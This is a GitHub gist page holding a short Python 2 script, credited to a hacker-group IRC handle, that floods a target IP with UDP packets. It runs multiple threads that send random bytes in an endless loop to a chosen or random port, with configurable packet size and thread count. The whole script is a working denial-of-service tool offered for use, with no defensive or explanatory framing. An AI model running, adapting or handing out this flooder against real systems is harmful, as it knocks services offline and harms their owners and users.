Skip to content

Instantly share code, notes, and snippets.

@zmaplex
Created March 4, 2017 12:22
Show Gist options
  • Save zmaplex/864bc3046802ed79f84ce329b0c58a63 to your computer and use it in GitHub Desktop.
Save zmaplex/864bc3046802ed79f84ce329b0c58a63 to your computer and use it in GitHub Desktop.
#!/usr/bin/python
import socket
import threading
import random
import sys
###########################################
#
# Author: sniker
# Contact: irc.eth0.info
#
# eth0 will prevail. || irc.eth0.info
#
############################################
class attack(threading.Thread):
def __init__ (self, ip, port, psize):
threading.Thread.__init__(self)
self.ip = ip
self.port = port
self.psize = psize
def run(self):
print "Thread initiated, flooding " + self.ip + ":" + str(self.port) + "."
sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
bytes = random._urandom(self.psize)
while True:
sock.sendto(bytes,(self.ip, self.port))
if len(sys.argv) < 2:
print "Usage: "+ sys.argv[0] +" IP PORT(optional, default random) PACKETSIZE(optional 0-65500 default 1024) THREADS(optional default 10)"
sys.exit()
try:
threads = sys.argv[4]
except NameError:
threads = 10
except IndexError:
threads = 10
try:
if int(sys.argv[3]) > 0 and int(sys.argv[3]) <= 65500:
psize = int(sys.argv[3])
print psize
else:
psize = 1024
except IndexError:
psize = 1024
for host in range(int(threads)):
try:
port = sys.argv[2]
except IndexError:
port = random.randrange(1, 65535, 2)
at = attack(sys.argv[1], int(port), int(psize))
at.start()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment